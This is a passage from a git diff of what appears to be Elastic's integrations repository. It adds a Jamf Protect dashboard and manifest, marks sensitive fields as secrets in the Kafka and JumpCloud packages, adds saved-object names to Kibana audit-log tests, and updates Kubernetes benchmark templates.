"e5f7a9d1-2951-4189-b17b-9657bc27a70e", + "title": "Top process Signing Information by TeamID", + "type": "lens" + } + ], + "timeRestore": false, + "title": "Jamf Protect", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-12T08:20:22.255Z", + "id": "jamf_protect-e9b86210-c65c-11ee-882f-57f79af43d7f", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "a8e0995f-628e-43ff-8052-0ec18332c1da:indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1d177394-ad48-4393-b81c-319a894a5686:indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a5ced168-f931-484a-bf34-898dee052142:indexpattern-datasource-layer-bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "35f2db30-0cb1-4d9d-9afe-dce4d8a973c9:indexpattern-datasource-layer-56e39079-aa13-438a-8f1e-39d3d1207797", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2fe17682-0e60-4338-a47a-971521a5e034:indexpattern-datasource-layer-fecd3402-4076-4ff6-8a63-e975ad495ec6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c21c7eaa-0dd6-4360-990c-8ef0dc734f2e:indexpattern-datasource-layer-2c906641-fc29-4d9a-829e-c62e84234311", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c667337a-237f-4002-9f74-4d914712fde5:indexpattern-datasource-layer-9e7e8b50-1080-47d3-8575-2564576e134a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d73b82e9-36bf-4d4b-a8e5-97f2dfa66d08:indexpattern-datasource-layer-7927b71e-c9eb-4afe-baa5-f19e68ca53e2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "273e31c4-09aa-4378-a9e2-280c302ac86c:indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ecb673d5-334d-4705-ac46-1f4878937090:indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e5f7a9d1-2951-4189-b17b-9657bc27a70e:indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d1892683-e559-40f2-9b70-90e8e29439f7:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_04593aef-ec66-4a07-a579-13a12d086631:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "jamf_protect-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/jamf_protect/kibana/tag/jamf_protect-security-solution-default.json b/packages/jamf_protect/kibana/tag/jamf_protect-security-solution-default.json new file mode 100644 index 00000000000..cd69d4eb5c8 --- /dev/null +++ b/packages/jamf_protect/kibana/tag/jamf_protect-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#D36086", + "description": "", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-08T14:04:04.315Z", + "id": "jamf_protect-security-solution-default", + "managed": true, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/jamf_protect/manifest.yml b/packages/jamf_protect/manifest.yml new file mode 100644 index 00000000000..c6272a0ad93 --- /dev/null +++ b/packages/jamf_protect/manifest.yml @@ -0,0 +1,64 @@ +format_version: 1.0.0 +name: jamf_protect +title: Jamf Protect +version: "0.3.0" +description: Receives events from Jamf Protect with Elastic Agent. +type: integration +categories: + - security +release: beta +conditions: + kibana.version: ^8.12.0 +screenshots: + - src: /img/jamfprotect_kibana.png + title: Jamf Protect Kibana + size: 1800x1138 + type: image/png +icons: + - src: /img/jamf_logo.svg + title: Jamf Logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: Jamf Protect + title: Jamf Protect events + description: Receive Jamf Protect events. + inputs: + - type: http_endpoint + title: Receive Jamf Protect Events via HTTP Endpoint + description: Receiving Jamf Protect events. + vars: + - name: listen_address + type: text + title: Listen Address + description: The bind address to listen for http endpoint connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false + required: true + show_user: true + default: 0.0.0.0 + - name: secret_header + type: text + title: Secret Header + description: The header to check for a specific value specified by `secret.value`. + required: false + show_user: false + - name: secret_value + type: password + title: Secret Value + description: The secret stored in the header name specified by `secret.header`. + required: false + show_user: false + - name: ssl + type: yaml + title: TLS + description: Options for enabling TLS for the listening webhook endpoint. See the [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/configuration-ssl.html) for a list of all options. + multi: false + required: false + show_user: false + default: | + enabled: false + certificate: "/etc/pki/client/cert.pem" + key: "/etc/pki/client/cert.key" +owner: + github: elastic/security-service-integrations + type: partner diff --git a/packages/jumpcloud/changelog.yml b/packages/jumpcloud/changelog.yml index c47bd4ecd49..b203d88a642 100644 --- a/packages/jumpcloud/changelog.yml +++ b/packages/jumpcloud/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.10.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.9.1" changes: - description: Changed owners diff --git a/packages/jumpcloud/data_stream/events/manifest.yml b/packages/jumpcloud/data_stream/events/manifest.yml index 32d66e04efc..b6d835908ce 100644 --- a/packages/jumpcloud/data_stream/events/manifest.yml +++ b/packages/jumpcloud/data_stream/events/manifest.yml @@ -21,11 +21,12 @@ streams: show_user: false description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. - name: api_key - type: text + type: password title: JumpCloud Directory Insights API Key show_user: true required: true default: API_KEY + secret: true - name: starting_point type: text title: Starting point for event collection relative to now diff --git a/packages/jumpcloud/manifest.yml b/packages/jumpcloud/manifest.yml index f176b72d9e0..59820bdfa92 100644 --- a/packages/jumpcloud/manifest.yml +++ b/packages/jumpcloud/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: jumpcloud title: "JumpCloud" -version: "1.9.1" +version: "1.10.0" description: "Collect logs from JumpCloud Directory as a Service" type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" elastic: subscription: "basic" screenshots: diff --git a/packages/juniper_srx/changelog.yml b/packages/juniper_srx/changelog.yml index ae47a1a1602..cead66527f7 100644 --- a/packages/juniper_srx/changelog.yml +++ b/packages/juniper_srx/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.21.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.20.1" changes: - description: Changed owners diff --git a/packages/juniper_srx/manifest.yml b/packages/juniper_srx/manifest.yml index 51938645fad..e57fbed7a04 100644 --- a/packages/juniper_srx/manifest.yml +++ b/packages/juniper_srx/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: juniper_srx title: Juniper SRX -version: "1.20.1" +version: "1.21.0" description: Collect logs from Juniper SRX devices with Elastic Agent. categories: ["network", "security", "firewall_security"] type: integration diff --git a/packages/kafka/changelog.yml b/packages/kafka/changelog.yml index 540d78d0100..14b41a8e6c3 100644 --- a/packages/kafka/changelog.yml +++ b/packages/kafka/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.13.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.12.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.12.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.11.0" changes: - description: Add missing SSL fields to agent config. diff --git a/packages/kafka/data_stream/consumergroup/manifest.yml b/packages/kafka/data_stream/consumergroup/manifest.yml index e286b1db4ca..7ef20f36209 100644 --- a/packages/kafka/data_stream/consumergroup/manifest.yml +++ b/packages/kafka/data_stream/consumergroup/manifest.yml @@ -15,6 +15,7 @@ streams: title: SASL username - name: password type: password + secret: true title: SASL password - name: mechanism type: text diff --git a/packages/kafka/data_stream/partition/manifest.yml b/packages/kafka/data_stream/partition/manifest.yml index 34f10f47e80..62f6052253f 100644 --- a/packages/kafka/data_stream/partition/manifest.yml +++ b/packages/kafka/data_stream/partition/manifest.yml @@ -16,6 +16,7 @@ streams: - name: password type: password title: SASL password + secret: true - name: mechanism type: text title: SASL mechanism diff --git a/packages/kafka/manifest.yml b/packages/kafka/manifest.yml index 63287c0d908..48c9b000d17 100644 --- a/packages/kafka/manifest.yml +++ b/packages/kafka/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: kafka title: Kafka -version: "1.11.0" +version: "1.13.0" description: Collect logs and metrics from Kafka servers with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -66,8 +66,9 @@ policy_templates: title: SSL Private Key show_user: true - name: ssl.key_passphrase - type: text + type: password title: SSL Key Passphrase + secret: true show_user: true - name: ssl.verification_mode type: text diff --git a/packages/kafka_log/changelog.yml b/packages/kafka_log/changelog.yml index 671dab2b14c..8bba1522e3e 100644 --- a/packages/kafka_log/changelog.yml +++ b/packages/kafka_log/changelog.yml @@ -1,3 +1,18 @@ +- version: "1.6.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.5.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.5.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 1.4.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/kafka_log/data_stream/generic/manifest.yml b/packages/kafka_log/data_stream/generic/manifest.yml index 975f8a8eef6..a544b4efa59 100644 --- a/packages/kafka_log/data_stream/generic/manifest.yml +++ b/packages/kafka_log/data_stream/generic/manifest.yml @@ -85,6 +85,7 @@ streams: - name: password type: password title: Password + secret: true description: Password used for SASL authentication. required: false show_user: true @@ -117,6 +118,7 @@ streams: - name: kerberos_password type: password title: Kerberos Password + secret: true description: If you configured password for Auth Type, you have to provide a password for the selected principal. required: false show_user: false diff --git a/packages/kafka_log/manifest.yml b/packages/kafka_log/manifest.yml index 43b5eb12333..b128b072eed 100644 --- a/packages/kafka_log/manifest.yml +++ b/packages/kafka_log/manifest.yml @@ -1,12 +1,12 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: kafka_log title: Custom Kafka Logs description: Collect data from kafka topic with Elastic Agent. type: integration -version: "1.4.0" +version: "1.6.0" conditions: kibana: - version: "^7.16.0 || ^8.0.0" + version: "^8.12.0" elastic: subscription: basic categories: diff --git a/packages/keycloak/changelog.yml b/packages/keycloak/changelog.yml index 21d3ba0cca1..73d4d82daa8 100644 --- a/packages/keycloak/changelog.yml +++ b/packages/keycloak/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.21.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9402 - version: "1.20.1" changes: - description: Changed owners diff --git a/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-config.yml index 22170cc500e..e73bc1b0eb9 100644 --- a/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -14,3 +14,5 @@ numeric_keyword_fields: - log.file.idxhi - log.file.idxlo - log.file.vol +assert: + hit_count: 6 diff --git a/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-non-utc-config.yml b/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-non-utc-config.yml index eb587fbc368..fd52deb1f15 100644 --- a/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-non-utc-config.yml +++ b/packages/keycloak/data_stream/log/_dev/test/system/test-logfile-non-utc-config.yml @@ -14,3 +14,5 @@ numeric_keyword_fields: - log.file.idxhi - log.file.idxlo - log.file.vol +assert: + hit_count: 6 diff --git a/packages/keycloak/manifest.yml b/packages/keycloak/manifest.yml index 6c2970e7dfb..4970508ce32 100644 --- a/packages/keycloak/manifest.yml +++ b/packages/keycloak/manifest.yml @@ -1,9 +1,9 @@ name: keycloak title: Keycloak -version: "1.20.1" +version: "1.21.0" description: Collect logs from Keycloak with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: [security, iam] conditions: kibana: diff --git a/packages/kibana/changelog.yml b/packages/kibana/changelog.yml index c2b37b9f68f..57d1ac2aecc 100644 --- a/packages/kibana/changelog.yml +++ b/packages/kibana/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.5.2" + changes: + - description: Adding SO name to audit events + type: enhancement + link: https://github.com/elastic/integrations/pull/9318 - version: "2.5.1" changes: - description: Add memory utilization metric diff --git a/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log b/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log index aea673f2bb9..4c0fca2c675 100644 --- a/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log +++ b/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log @@ -1,3 +1,4 @@ {"event":{"action":"http_request","category":["web"],"outcome":"unknown"},"http":{"request":{"method":"get"}},"url":{"domain":"kibana","path":"/api/fleet/enrollment_api_keys/e0a0d409-b22f-4cd0-b417-c934c621ce07","port":5601,"scheme":"https"},"user":{"name":"elastic","roles":["superuser"]},"kibana":{"space_id":"default"},"trace":{"id":"2eeefc09-26a2-4aea-840d-9170b0a9c95f"},"service":{"node":{"roles":["background_tasks","ui"]}},"ecs":{"version":"8.4.0"},"@timestamp":"2022-09-09T13:15:24.041+00:00","message":"User is requesting [/api/fleet/enrollment_api_keys/e0a0d409-b22f-4cd0-b417-c934c621ce07] endpoint","log":{"level":"INFO","logger":"plugins.security.audit.ecs"},"process":{"pid":7},"transaction":{"id":"858c45e94edb1814"}} {"event":{"action":"user_login","category":["authentication"],"outcome":"success"},"user":{"name":"elastic","roles":["superuser"]},"kibana":{"session_id":"Bv1bSOJ7dMYoppdDmlCiPfP1v8Q7JHXDpc2mOrfoxJs=","authentication_provider":"basic","authentication_type":"basic","authentication_realm":"reserved","lookup_realm":"reserved"},"trace":{"id":"5233d304-16b6-479b-9e45-a906107a5f53"},"service":{"node":{"roles":["background_tasks","ui"]}},"ecs":{"version":"8.4.0"},"@timestamp":"2022-09-09T13:16:57.990+00:00","message":"User [elastic] has logged in using basic provider [name=basic]","log":{"level":"INFO","logger":"plugins.security.audit.ecs"},"process":{"pid":7},"transaction":{"id":"2fd40f9b4f4ca767"}} {"event":{"action":"space_get","category":["database"],"type":["access"],"outcome":"success"},"kibana":{"space_id":"default","session_id":"Bv1bSOJ7dMYoppdDmlCiPfP1v8Q7JHXDpc2mOrfoxJs=","saved_object":{"type":"space","id":"default"}},"user":{"name":"elastic","roles":["superuser"]},"trace":{"id":"fbed6b3b-4e1c-4525-9597-391d5f718e89"},"service":{"node":{"roles":["background_tasks","ui"]}},"ecs":{"version":"8.4.0"},"@timestamp":"2022-09-09T13:16:58.044+00:00","message":"User has accessed space [id=default]","log":{"level":"INFO","logger":"plugins.security.audit.ecs"},"process":{"pid":7},"transaction":{"id":"256b899bfffe8b3f"}} +{"event":{"action":"bulk_get","category":["database"],"type":["access"],"outcome":"success"},"kibana":{"space_id":"default","session_id":"Bv1bSOJ7dMYoppdDmlCiPfP1v8Q7JHXDpc2mOrfoxJs=","saved_object":{"type":"fake","id":"1","name":"so_name_1"}},"user":{"name":"elastic","roles":["superuser"]},"trace":{"id":"fbed6b3b-4e1c-4525-9597-391d5f718e89"},"service":{"node":{"roles":["background_tasks","ui"]}},"ecs":{"version":"8.4.0"},"@timestamp":"2022-09-09T13:16:58.044+00:00","message":"User has accessed space [id=default]","log":{"level":"INFO","logger":"plugins.security.audit.ecs"},"process":{"pid":7},"transaction":{"id":"256b899bfffe8b3f"}} diff --git a/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log-expected.json b/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log-expected.json index 1b339b0a9f1..276627c5bc6 100644 --- a/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log-expected.json +++ b/packages/kibana/data_stream/audit/_dev/test/pipeline/test-kibana-audit-logs.log-expected.json @@ -163,6 +163,62 @@ "superuser" ] } + }, + { + "@timestamp": "2022-09-09T13:16:58.044+00:00", + "ecs": { + "version": "8.4.0" + }, + "event": { + "action": "bulk_get", + "category": [ + "database" + ], + "created": "2022-09-09T13:16:58.044+00:00", + "ingested": "2022-09-09T13:44:23.397440547Z", + "kind": "event", + "outcome": "success", + "type": [ + "access" + ] + }, + "kibana": { + "saved_object": { + "id": "1", + "type": "fake", + "name": "so_name_1" + }, + "session_id": "Bv1bSOJ7dMYoppdDmlCiPfP1v8Q7JHXDpc2mOrfoxJs=", + "space_id": "default" + }, + "log": { + "level": "INFO", + "logger": "plugins.security.audit.ecs" + }, + "message": "User has accessed space [id=default]", + "process": { + "pid": 7 + }, + "service": { + "node": { + "roles": [ + "background_tasks", + "ui" + ] + } + }, + "trace": { + "id": "fbed6b3b-4e1c-4525-9597-391d5f718e89" + }, + "transaction": { + "id": "256b899bfffe8b3f" + }, + "user": { + "name": "elastic", + "roles": [ + "superuser" + ] + } } ] } \ No newline at end of file diff --git a/packages/kibana/data_stream/audit/fields/package-fields.yml b/packages/kibana/data_stream/audit/fields/package-fields.yml index 373bfd08e46..4b885147b1c 100644 --- a/packages/kibana/data_stream/audit/fields/package-fields.yml +++ b/packages/kibana/data_stream/audit/fields/package-fields.yml @@ -13,6 +13,9 @@ - name: saved_object.id type: keyword description: The id of the saved object associated with this event. + - name: saved_object.name + type: keyword + description: The name of the saved object associated with this event. - name: add_to_spaces type: keyword description: The set of space ids that a saved object was shared to. diff --git a/packages/kibana/docs/README.md b/packages/kibana/docs/README.md index 6e2edc397f0..1a174bea646 100644 --- a/packages/kibana/docs/README.md +++ b/packages/kibana/docs/README.md @@ -47,6 +47,7 @@ UI in Kibana. To enable this usage, set `xpack.enabled: true` on the package con | kibana.delete_from_spaces | The set of space ids that a saved object was removed from. | keyword | | kibana.lookup_realm | The Elasticsearch lookup realm which fulfilled a login event. | keyword | | kibana.saved_object.id | The id of the saved object associated with this event. | keyword | +| kibana.saved_object.name | The name of the saved object associated with this event. | keyword | | kibana.saved_object.type | The type of the saved object associated with this event. | keyword | | kibana.session_id | The ID of the user session associated with this event. Each login attempt results in a unique session id. | keyword | | kibana.space_id | The id of the space associated with this event. | keyword | diff --git a/packages/kibana/manifest.yml b/packages/kibana/manifest.yml index 3ea94ce64bf..11a16bcc765 100644 --- a/packages/kibana/manifest.yml +++ b/packages/kibana/manifest.yml @@ -1,6 +1,6 @@ name: kibana title: Kibana -version: 2.5.1 +version: 2.5.2 description: Collect logs and metrics from Kibana with Elastic Agent. type: integration icons: diff --git a/packages/kubernetes/_dev/benchmark/rally/container-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/container-benchmark.yml index 1a606694724..f49a559cf9c 100644 --- a/packages/kubernetes/_dev/benchmark/rally/container-benchmark.yml +++ b/packages/kubernetes/_dev/benchmark/rally/container-benchmark.yml @@ -1,10 +1,10 @@ --- -description: Benchmark 864000 kubernetes.container events ingested +description: Benchmark 8640000 kubernetes.container events ingested data_stream: name: container corpora: generator: - total_events: 864000 + total_events: 8640000 template: type: gotext path: ./container-benchmark/template.ndjson diff --git a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/config.yml index f6dfffb2b59..921fbadd6d4 100644 --- a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/config.yml +++ b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/config.yml @@ -37,10 +37,27 @@ fields: range: min: 0 max: 10000 - - name: Percentage + - name: PercentageMemory range: - min: 0 - max: 5000 - fuzziness: 0.005 + min: 0.0 + max: 1.0 + - name: PercentageCPU + range: + min: 0.0 + max: 1.0 + - name: usage.* + object_keys: + - nanoseconds + - nanocores + - name: usage.nanoseconds + range: + min: 100000 + max: 9000000000 + cardinality: 10000 + - name: usage.nanocores + range: + min: 100000 + max: 9000000 + cardinality: 10000 - name: container.name enum: ["web", "default-http-backend", "dnsmasq", "csi-driver", "web", "web", "web", "prometheus", "konnectivity-agent", "sidecar", "kubedns", "metrics-server-nanny", "web", "web", "fluentbit", "autoscaler", "gke-metrics-agent", "elastic-agent", "web", "kube-state-metrics", "metrics-server", "fluentbit", "elastic-agent", "web", "prometheus-to-sd-exporter"] diff --git a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/fields.yml index cd8bc3e997d..1e2eb7cefb7 100644 --- a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/fields.yml +++ b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/fields.yml @@ -22,8 +22,17 @@ type: long - name: Ip type: ip -- name: Percentage +- name: PercentageMemory type: double +- name: PercentageCPU + type: double +- name: usage + type: group + fields: + - name: nanoseconds + type: integer + - name: nanocores + type: integer - name: rangeofid type: integer - name: agent.snapshot diff --git a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/template.ndjson index 53226c74037..6cfd742845c 100644 --- a/packages/kubernetes/_dev/benchmark/rally/container-benchmark/template.ndjson +++ b/packages/kubernetes/_dev/benchmark/rally/container-benchmark/template.ndjson @@ -5,19 +5,22 @@ {{- $agentEphemeralid := generate "agent.ephemeral_id" -}} {{- $timestamp := generate "timestamp" }} {{- $faults := generate "faults" -}} -{{- $pct := generate "Percentage" -}} +{{- $pctmem := generate "PercentageMemory" }} +{{- $pctcpu := generate "PercentageCPU" }} +{{- $usage_nanoseconds := generate "usage.nanoseconds" | mul 1000 -}} +{{- $usage_nanocores := generate "usage.nanocores" | mul 1000 -}} {{- $rangeofid := generate "rangeofid" -}} {{- $nodeid := div $rangeofid 110 -}} {{- $name := generate "container.name" -}} { "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.999999Z07:00"}}", "container":{ "memory":{ - "usage": {{divf $pct 1000000}} + "usage": {{$pctmem}} }, "name":"{{ $name }}", "runtime":"containerd", "cpu":{ - "usage": {{divf $pct 1000000}} + "usage": {{$pctcpu}} }, "id":"container-{{ $rangeofid }}" }, @@ -31,11 +34,11 @@ "majorpagefaults": {{ $faults }}, "usage":{ "node":{ - "pct": {{divf $pct 1000000}} + "pct": {{$pctmem}} }, "bytes": {{generate "Bytes"}}, "limit":{ - "pct": {{divf $pct 1000000}} + "pct": {{$pctmem}} } }, "available":{ @@ -44,7 +47,7 @@ "workingset":{ "bytes": {{generate "Bytes"}}, "limit":{ - "pct": {{divf $pct 1000000}} + "pct": {{$pctmem}} } }, "pagefaults": "{{ $faults }}" @@ -67,14 +70,14 @@ "cpu":{ "usage":{ "core":{ - "ns": 41129679 + "ns": {{$usage_nanoseconds}} }, "node":{ - "pct": {{divf $pct 1000000}} + "pct": {{ $pctcpu}} }, - "nanocores":0, + "nanocores":{{$usage_nanocores}}, "limit":{ - "pct": {{divf $pct 1000000}} + "pct": {{$pctcpu}} } } }, diff --git a/packages/kubernetes/_dev/benchmark/rally/event-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/event-benchmark.yml new file mode 100644 index 00000000000..a53369a36fb --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/event-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark of 20000 kubernetes.event event ingested +data_stream: + name: event +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./event-benchmark/template.ndjson + config: + path: ./event-benchmark/config.yml + fields: + path: ./event-benchmark/fields.yml diff --git a/packages/kubernetes/_dev/benchmark/rally/event-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/config.yml new file mode 100644 index 00000000000..ac3dbf295c7 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/config.yml @@ -0,0 +1,40 @@ +fields: + - name: timestamp + period: 60m + - name: event_count + range: + min: 1 + max: 10000 + - name: event_duration + range: + min: 1 + max: 10000000 + - name: duration_start + enum: ["-1h", "-2h", "-3h", "-4h"] + - name: duration_end + enum: ["-30m", "-20m", "-10m", "-40m"] + - name: involved_object_kind + enum: ["Pod", "Node"] + - name: message_normal + value: "Node minikube status is now:" + - name: message_warning_backoff + value: "Back-off restarting failed container" + - name: message_warning_failed + enum: + - "Error: ErrImagePull" + - "Error: ImagePullBackOff" + - "Failed to pull image 'mylogin/posts:0.0.1': rpc error: code = Unknown desc = Error response from daemon: pull access denied for mylogin/posts, repository does not exist or may require 'docker login'" + - name: type + enum: ["Normal", "Warning"] + - name: reason_normal + enum: ["NodeHasSufficientDisk", "NodeHasSufficientMemory", "NodeHasNoDiskPressure", "NodeHasSufficientPID"] + - name: reason_warning + enum: ["Failed", "BackOff"] + - name: rangeofid + range: + min: 0 + max: 10000 + - name: metadata_resource_version + range: + min: 400000 + max: 500000 diff --git a/packages/kubernetes/_dev/benchmark/rally/event-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/fields.yml new file mode 100644 index 00000000000..72b271d84bd --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/fields.yml @@ -0,0 +1,38 @@ +- name: Ip + type: ip +- name: timestamp + type: date +- name: duration_start + type: keyword +- name: duration_end + type: keyword +- name: event_count + type: long +- name: event_duration + type: long +- name: involved_object_kind + type: keyword +- name: involved_object_name + type: keyword +- name: message_normal + type: keyword +- name: message_warning_backoff + type: keyword +- name: message_warning_failed + type: keyword +- name: reason_normal + type: keyword +- name: reason_warning + type: keyword +- name: metadata_generate_name + type: keyword +- name: metadata_timestamp_created + type: date +- name: reason + type: keyword +- name: type + type: keyword +- name: rangeofid + type: integer +- name: metadata_resource_version + type: long diff --git a/packages/kubernetes/_dev/benchmark/rally/event-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/template.ndjson new file mode 100644 index 00000000000..ddb96a75207 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/event-benchmark/template.ndjson @@ -0,0 +1,139 @@ +{{- $timestamp := generate "timestamp" }} +{{- $event_count := generate "event_count" }} +{{- $event_duration := generate "event_duration" }} +{{- $duration_start := generate "duration_start" }} +{{- $duration_end := generate "duration_end" }} +{{- $first_occurrence := generate "timestamp" | date_modify (print $duration_start) }} +{{- $last_occurrence := generate "timestamp" | date_modify (print $duration_end) }} +{{- $involved_object_kind := generate "involved_object_kind" }} +{{- $involved_object_name := generate "involved_object_name" }} +{{- $message_normal := generate "message_normal" }} +{{- $message_warning_backoff := generate "message_warning_backoff" }} +{{- $message_warning_failed := generate "message_warning_failed" }} +{{- $reason_normal := generate "reason_normal" }} +{{- $reason_warning := generate "reason_warning" }} +{{- $metadata_generate_name := generate "metadata_generate_name" }} +{{- $metadata_resource_version := generate "metadata_resource_version" }} +{{- $reason := generate "reason" }} +{{- $type := generate "type" }} +{{- $rangeofid := generate "rangeofid" -}} +{{- $eventid := div $rangeofid 110 -}} +{ + "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.000Z07:00"}}", + "metricset": { + "name": "event" + }, + "agent": { + "type": "metricbeat", + "version": "8.8.0", + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "name": "kubernetes-scale-123456" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "version": "8.8.0", + "snapshot": true + }, + "ecs": { + "version": "8.5.0" + }, + "event": { + "duration": {{ $event_duration }}, + "dataset": "kubernetes.event", + "module": "kubernetes" + }, + "data_stream": { + "namespace": "ep", + "type": "metrics", + "dataset": "kubernetes.event" + }, + "service": { + "type": "kubernetes" + }, + "orchestrator":{ + "cluster":{ + "name":"kubernetes-scale", + "url":"https://{{ generate `Ip` }}" + } + }, + "kubernetes": { + "event": { + "metadata": { + "uid": "host-{{ $eventid }}", + "resource_version": "{{ $metadata_resource_version }}", + "timestamp": { + "created": "{{ $first_occurrence.Format "2006-01-02T15:04:05.000Z07:00" }}" + }, + "name": "host-{{ $eventid }}", + "namespace": "demo-{{ $eventid }}", + "self_link": 